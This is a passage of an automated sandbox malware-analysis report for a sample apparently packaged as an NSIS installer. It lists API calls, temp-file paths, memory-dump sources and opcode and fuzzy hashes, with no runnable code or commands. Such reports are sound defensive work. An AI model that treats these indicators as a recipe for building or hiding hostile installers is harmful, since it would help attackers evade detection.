                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                                                                  • Opcode ID: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
                                                                                                                                                                                                  • Instruction ID: 6d3b5365c2144e4253305efdfeae8c7c86b7c4bf3cccdf3f9a106f7510f1e1f6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6121BD71800124BBCF216FA9DE49D9F7E79EF05364F10023AF560762E1CB784D419BA8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F772522
                                                                                                                                                                                                    • Part of subcall function 6F77122C: lstrcpynW.KERNEL32(00000000,?,6F7712DF,00000019,6F7711BE,-000000A0), ref: 6F77123C
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 6F7724A8
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F7724C3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4216380887-0
                                                                                                                                                                                                  • Opcode ID: fe1f9f8367f7607eac39f2b961374cfbca3779754fe5cbf2aac6f4eee1189777
                                                                                                                                                                                                  • Instruction ID: ef464aaa8d1ff59d3de840db9f35867449a9a0edfa29152fbd367cb3edbed4ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe1f9f8367f7607eac39f2b961374cfbca3779754fe5cbf2aac6f4eee1189777
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41CDB0128705EFCF349F799A54A6677F8FB8A314F004A6EE465C6181DF70A944CFA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1354259210-0
                                                                                                                                                                                                  • Opcode ID: 6b0427dfa76692f151d7caa9231c5c88ba32a8d947b338249052deafdd589e1a
                                                                                                                                                                                                  • Instruction ID: 81522b48e592499502658fb4677f1b0f70c545d6b701466da39e5ccb8a756ba0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b0427dfa76692f151d7caa9231c5c88ba32a8d947b338249052deafdd589e1a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F215A72500109BBEF129F90CE89EEF7A7DEB54344F110076B945B11A0E7B48E54AAA8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                  • Opcode ID: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                                                                                                                                                  • Instruction ID: ee10c8015a3e92cf614b22ba24180aec604fe5fe026a1179c0e7be4a3fdf0cdb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E621F672900119AFCB05DFA4DE45AEEBBB5EF08314F14003AFA45F62A0C7789D51DB98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                                                                                  • Opcode ID: ff5e119c1dfec186f1bc31a23d162186e9d3ca2dfc2df7b145d176ccd9f6b251
                                                                                                                                                                                                  • Instruction ID: 39ccdc2dc8d2035913c0323839c6798354fd507b9908b2fcb43e3dcb67b0f82d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff5e119c1dfec186f1bc31a23d162186e9d3ca2dfc2df7b145d176ccd9f6b251
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6019271904240EFE7005BB0EE4AB9A3FB4BB15300F208A3AF141B75E2C6B904458BED
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                  • Opcode ID: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                                                                                                                                                  • Instruction ID: 0f37489a7ff55aa34ce709233052591c61f0789b3923deb1f93634f017c8c928
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E821AD7195420AAEEF05AFB4D94AAEE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,?,00000000,00000400,?), ref: 00404CB5
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404CBE
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                                                                  • Opcode ID: 0de71dd1f65287a19c767322f40b6e95ae33ee85482e893f5b2d92d4d5838e0a
                                                                                                                                                                                                  • Instruction ID: 33068f1a2098bbc59acf923d0b26dc9f7285eb9428391dcb76f0b5068863668e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0de71dd1f65287a19c767322f40b6e95ae33ee85482e893f5b2d92d4d5838e0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A11EB73A041283BEB00656D9D46E9E329C9B85334F264237FA25F31D1E978C82182EC
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 00405CEC
                                                                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 00405CF6
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405D08
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                  • API String ID: 2659869361-3355392842
                                                                                                                                                                                                  • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                                  • Instruction ID: e2e9208f063340fd7176cb3713d1db1a131c248cac7d4947b15e4777b480a213
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FD0A771101A306AC1117B84AC05DDF669CAE85300381403BF201B30A4C77C1D5187FD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll), ref: 0040268D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp$C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll
                                                                                                                                                                                                  • API String ID: 1659193697-3324404147
                                                                                                                                                                                                  • Opcode ID: 8557b45293e6f8527438fc850423d9752acb09fd20e21ce600e6676ef8ed037d
                                                                                                                                                                                                  • Instruction ID: 2f8f56cab2ec293de193d712fca88bf9bcdcc229c68306483e13e7e6ef2e3e02
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8557b45293e6f8527438fc850423d9752acb09fd20e21ce600e6676ef8ed037d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11E772A00205ABCB10AFB18F4AAAF77719F44748F25043FE402B71C1EAFD8891565E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DestroyWindow.USER32(?,00000000,0040318F,00000001,?,?,00000009,?), ref: 00402FC4
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                                                                                                                  • CreateDialogParamW.USER32(?,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,00000009,?), ref: 0040300D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                                  • Opcode ID: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                                                                                                                                                  • Instruction ID: d33bc14a5fcc1787285ca97da28f022d839d2e13e88132ee71d9f244d0d7cdfd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF05E3160AA21ABC6216F10FF0DA8B7B64BB48B41741487AF842B15E9DB740CA1DB9D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,?,00000009,?), ref: 0040641E
                                                                                                                                                                                                    • Part of subcall function 00405D91: CharNextW.USER32(?,?,0042FA70,?,00405E05,0042FA70,0042FA70,75D43420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75D43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                                                                                                                                                    • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                                                                                                                                                    • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                                                                                                                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75D43420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75D43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E47
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75D43420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75D43420,C:\Users\user\AppData\Local\Temp\), ref: 00405E57
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DEE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
